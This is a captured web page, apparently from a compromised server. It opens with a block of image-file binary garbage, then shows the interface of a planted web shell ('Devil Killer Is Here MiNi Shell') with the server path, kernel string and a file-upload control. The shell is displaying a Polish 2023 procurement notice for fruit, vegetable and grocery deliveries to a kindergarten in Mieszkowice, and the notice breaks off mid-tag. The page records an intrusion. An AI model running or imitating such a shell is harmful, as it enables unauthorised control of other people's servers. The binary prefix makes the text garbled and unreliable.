JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230104/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230104/0000947101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa artykułów żywnościowych do Przedszkola Samorządowego w Mieszkowicach w roku 2023r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedszkole Samorządowe</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 320916300</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Willowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mieszkowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-505</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przedszkolemieszkowice@poczta.fm</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.przedszkolemieszkowice.szkolnastrona.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa artykułów żywnościowych do Przedszkola Samorządowego w Mieszkowicach w roku 2023r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c7ed82f5-8c2a-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00009471</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mieszkowice <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu odbywa się elektronicznie za pośrednictwem platformy<br/>(portalu) https://platformazakupowa.pl/pn/mieszkowice i formularza &#34;Wyślij wiadomość&#34;.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>6. Oferta, podmiotowe środki dowodowe oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie<br/>muszą zostać podpisane elektronicznym kwalifikowanym podpisem.<br/>7. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ<br/>8. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem<br/>platformy https://platformazakupowa.pl/pn/mieszkowice Wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat<br/>systemowy &#34;pytanie wysłane&#34;.<br/>9. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z<br/>platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz<br/>uznaje go za wiążący, zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem.<br/>10. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez zamawiającego za<br/>ofertę handlową i nie będzie brana pod uwagę w przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony<br/>w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>11. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem II SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem II SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PSM.271.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna, codzienna dostawa artykułów żywnościowych w zależności od aktualnych<br/>potrzeb Zamawiającego do Przedszkola Samorządowego w Mieszkowicach, ul Willowa 1:<br/>Różne produkty spożywcze i miód naturalny<br/>1. Ananas w puszce, w lekkim syropie, bez dodatku chemicznych substancji dodatkowych do żywności<br/>(głównie substancji konserwujących, regulatorów kwasowości) szt. 565 g* 10<br/>2. Biszkopty bez zawartości masy jajowej i emulgatorów typu E, typu PETIT szt. 120gl* 300<br/>3. Bazylia suszona szt. 10 g* 50<br/>4. Brzoskwinie połówki w syropie, bez dodatku chemicznych substancji dodatkowych do żywności<br/>(głównie substancji konserwujących, regulatorów kwasowości) szt. 850 g* 10<br/>5. Budyń o smaku śmietankowym, bez dodatku cukru szt. 35* 250<br/>6. Budyń o smaku waniliowym, bez dodatku cukru szt 35g* 250<br/>7. Cynamon bez barwników, konserwantów i glutaminianu sodu typu szt 30<br/>8. Czosnek granulowany bez barwników, konserwantów i glutaminianu sodu szt 100<br/>9. Cukier waniliowy szt. 16g* 40<br/>10. Curry bez barwników, konserwantów i glutaminianu sodu szt. 15<br/>11. Cukier biały szt. 1kg* 450<br/>12. Czekolada gorzka min. 70% kakao szt. 100 g* 50<br/>13. Cukier puder, niezbrylony torba foliowa szt. 400g* 10<br/>14. Dżem owocowy niskosłodzony, 100% owoców szt. 220 g* 300<br/>15. Fasola czerwona konserwowa puszka bez dodatku cukru i substancji słodzących oraz soli, bez konserwantów szt. 400<br/>g* 10<br/>16. Fasola sucha drobna szt 1,00kg* 20<br/>17. Groszek konserwowy wysokogatunkowy szt. 400g* 50<br/>18. Groch łuskany, pozbawiony łuski, połówki kg 1,00kg* 40<br/>19. Herbatniki szt. 50g* 850<br/>20. Herbata czarna granulowana wysokogatunkowa typu Lipton lun równoważna szt. 100g* 100<br/>21. Herbata czarna ekspresowa 100 saszetek wysokogatunkowa szt. 15<br/>22. Herbata ziołowa mięta (saszetki) skład 100% liścia mięty szt. 30<br/>23. Herbata owocowo-ziołowa (saszetki) zawierająca wyłącznie naturalne składniki, szt. 30<br/>24. Koncentrat pomidorowy bez konserwantów kl. .I minimalna zawartość ekstraktu 30% typu szt. 990g* 70<br/>25. Kawa zbożowa bez cukru typu Inka lub równoważna szt 150g* 80<br/>26. Kukurydza konserwowa słodka bez dodatku cukru wysokogatunkowa szt 340g* 80<br/>27. Kakao ciemne nie alkalizowane o obniżonej zawartości tłuszczu zawierające min.11% tłuszczu kakaowego szt 180g*<br/>300<br/>28. Ketchup łagodny bez konserwantów zawierający min. 190g pomidorów na 100g produktu szt 480g* 60<br/>29. Kasza jęczmienna gruba w torbie papierowej kg 1 kg 100<br/>30. Kasza manna gat. I kg 1 kg 40<br/>31. Liść laurowy bez barwników, konserwantów i glutaminianu sodu szt. 100<br/>32. Makaron świdry z mąki pszennej bez zawartości masy jajecznej i kurkumy szt. 400 g* 300<br/>33. Makaron pióra z maki pszennej bez zawartości masy jajecznej i kurkumy szt. 400 g* 300<br/>34. Makaron nitka cięta z maki pszennej bez zawartości masy jajecznej i kurkumy szt. 400g* 300<br/>35. Makaron kokardka mała z mąki pszennej bez zawartości masy jajecznej i kurkumy szt. 400 g* 250<br/>36. Makaron muszelka z mąki pszennej bez zawartości masy jajecznej i kurkumy typu szt. 400 g* 100<br/>37. Makron Pióra z maki pszennej pełnoziarnistej bez zawartości masy jajecznej i kurkumy szt. 400g* 50<br/>38. Mąka ziemniaczana w torbie papierowej szt. 1kg* 50<br/>39. Mąka pszenna wrocławska typ 500 w torbie papierowej szt. 1kg* 250<br/>40. Miód pszczeli nektarowy z własnej pasieki, różne smaki szt. 400 g* 50<br/>41. Miód pszczeli nektarowy z własnej pasieki, różne smaki, szt. 200 g* 200<br/>42. Morela suszona bez barwników i konserwantów szt 20<br/>43. Majonez dekoracyjny wysokogatunkowy szt 400g* 80<br/>44. Musztarda sarepska wysokogatunkowa bez konserwantów szt 185g* 20<br/>45. Majeranek bez barwników, konserwantów i glutaminianu sodu szt 100<br/>46. Naturalna woda mineralna nisko lub średni zmineralizowana w butelce .szt 1,5l* 500<br/>47. Oliwa z oliwek EXTRA VERGINE do sałatek szt 500ml* 5<br/>48. Olej rzepakowy z pierwszego tłoczenia, rafinowany o zawartości kwasów jednonienasyconych powyżej 50% i zawartości<br/>kwasów wielonasyconych poniżej 40% szt 3l 100<br/>49. Ocet jabłkowy szt. 250ml* 5<br/>50. Ocet 10% szt. 1 l* 5<br/>51. Oregano bez barwników, konserwantów i glutaminianu sodu szt 80<br/>52. Ogórki konserwowe zawierające nie więcej niż 1g soli w 100g produktu szt. 50<br/>53. Płatki kukurydziane z zawartością grysu kukurydzanego min.98% z witaminami i obniżona zawartością żelaza szt. 220-<br/>320g* 250<br/>54. Płatki owsiane zwykłe szt. 400 g* 250<br/>55. Papryka słodka, bez barwników, konserwantów i glutaminianu sodu szt. 20g* 100<br/>56. Papryka ostra bez barwników, konserwantów i glutaminianu sodu szt. 20 g* 80<br/>57. Pieprz czarny mielony bez konserwantów i glutaminianu sodu kg 20g* 150<br/>58. Pieprz ziołowy bez barwników, konserwantów i glutaminianu sodu szt. 25 g* 100<br/>59. Proszek do pieczenia kg 30g* 15<br/>60. Pomidory całe, bez skórki w soku pomidorowym, bez konserwantów szt. 400g* 100<br/>61. Ryz biały ziarnisty sypki, torba papierowa kg 1kg* 100<br/>62. Ryz paraboliczny opakowanie zawierające 4x100g szt. 250<br/>63. Rodzynki sułtanki bez substancji konserwujących szt 30<br/>64. Sól o obniżonej zawartości sodu (sodowo-potasowa) bez antyzbrylacza E536 , biała, niezbrylona szt. 10<br/>65. Sól spożywcza jodowana, niezbrylona szt. 1kg* 110<br/>66. Syrop owocowy malina bez barwników, bez konserwantów szt 400-50ml* 50<br/>67. Syrop owocowy truskawka bez barwników, bez konserwantów szt. 400-500ml* 20<br/>68. Sok 100% (nie napój) częściowo z soków zagęszczonych z dodatkiem witamin ze słomką wysokogatunkowy szt 200ml*<br/>600<br/>69. Sok przecierany zagęszczony 100% owoców bez dodatku cukru szt 900ml* 200<br/>70. Sok marchwiowo-owocowy (mix smaków) szt 300ml* 400<br/>71. Soda oczyszczona szt. 40<br/>72. Szczaw konserwowy krojony (nie siekany i nie przecierany) szt. 250-300g* 70<br/>73. Tymianek bez barwników , konserwantów i glutaminianu sodu szt. 80<br/>74. Wafelek bez czekolady szt. 600<br/>75. Ziele angielskie bez barwników, konserwantów i glutaminianu sodu szt 100<br/>76. Żurawina suszona bez substancji konserwujących szt 30<br/>77. Morela suszona bez substancji konserwujących szt. 30<br/>78. Mąka graham typ 1850 szt. 1kg* 50<br/>79. Pałeczki kukurydziane (nie chrupki) bez glutenu i konserwantów szt. 50<br/>60. Wiórki kokosowe szt. 200 g* 10<br/>61. Ziarno słonecznika łuskane, bez konserwantów szt. 10<br/>62. Zioła prowansalskie szt. 10 g 15 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03142100-9 - Miód naturalny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna, codzienna dostawa artykułów żywnościowych w zależności od aktualnych<br/>potrzeb Zamawiającego do Przedszkola Samorządowego w Mieszkowicach, ul Willowa 1:<br/>Warzywa i owoce świeże , jaja, ziemniaki<br/>1. Arbuz kg 150<br/>2. Banan klasa jakości I, kolor żółty, bez przebarwień kg 300<br/>3. Brokuł świeże, klasa jakości I szt. 30<br/>4. Brzoskwinia klasa jakości I, dojrzałe kg 25<br/>5. Burak czerwony ćwikłowe, podłużne, klasa jakości I kg 450<br/>6. Cebula biała klasa jakości I kg 80<br/>7. Cukinia klasa jakości I kg 15<br/>8. Cytryna gat. I, żółta i cienka skórka kg 60<br/>9. Czosnek (główka) szt. 30<br/>10. Botwina pęczek szt. 50<br/>11. Gruszka klasa jakości I, dojrzałe kg 100<br/>12. Jabłko klasa jakości I dojrzałe kg 2500<br/>13. Kalafior gat. I, świeży, biały, bez wykwitów szt. 60<br/>14. Kalarepa klasa jakości I szt 150<br/>15. Kapusta biała gat. I szt 200<br/>16. Kapusta młoda sezonowo szt. 80<br/>17. Kapusta czerwona gat. I szt 100<br/>18. Kapusta kiszona nie zakwaszona chemicznie op. do 5 kg kg 130<br/>19. Kapusta pekińska gat. I szt 100<br/>20. Kiwi gat. I, dojrzałe szt. 600<br/>21. Koperek zielony, świeży (pęczki) szt. 80<br/>22. Maliny porcjowane w opakowaniach 250g op 30<br/>23. Mandarynka klasa jakości I, bez pestek, cienka skórka kg 150<br/>24. Marchew średniej wielkości, gat. I kg 400<br/>25. Nektarynka klasa jakości I kg 40<br/>26. Ogórek gruntowy kg 100<br/>27. Ogórek zielony świeży, prosty, klasa jakości I kg 180<br/>28. Papryka czerwona, żółta, zielona świeża, gat. I kg 120<br/>29. Pieczarki gat. I, świeże, młode, średniej wielkości kg 100<br/>30. Pietruszka korzeń gat. I, średniej wielkości kg 100<br/>31. Pietruszka zielona (pęczek) szt. 300<br/>32. Pomarańcza gat. I, cienka skórka kg 80<br/>33. Pomidor świeże gat. I, twarde, średniej wielkości kg 200<br/>34. Por świeży, klasa jakości I szt 120<br/>35. Sałata klasa jakości I, duże główki szt. 100<br/>36. Sałata lodowa klasa jakości I, duże główki szt. 100<br/>37. Seler klasa jakości I kg 320<br/>38. Śliwka świeże, klasa jakości I, twarde kg 30<br/>39. Truskawka (sezonowo) kg 50<br/>40. Winogrono bezpestkowe dojrzałe kg 100<br/>41. Ziemniak jadalny młody, gat. I kg 2500<br/>42. Ziemniak jadalny, gat. I kg 4500<br/>43. Włoszczyzna młoda –pęczek (sezonowo) szt. 50<br/>44. Szczypior - pęczek szt. 500<br/>45. Rzodkiewka -pęczek szt. 300<br/>46. Rzodkiew biała (sople) kg 100<br/>47. Ogórek małosolny (sezonowo) kg 50<br/>48. Ogórek kiszony (wiaderko 0,5 kg) szt. 120<br/>49. Jaja świeże klasy A szt. 3500<br/>50. Fasola sucha szt 30<br/>51. Groch suszony szt 50 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03100000-2 - Produkty rolnictwa i ogrodnictwa</p> <p class="mb-0">03212100-1 - Ziemniaki</p> <p class="mb-0">03221000-6 - Warzywa</p> <p class="mb-0">03222000-3 - Owoce i orzechy</p> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towaru</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span 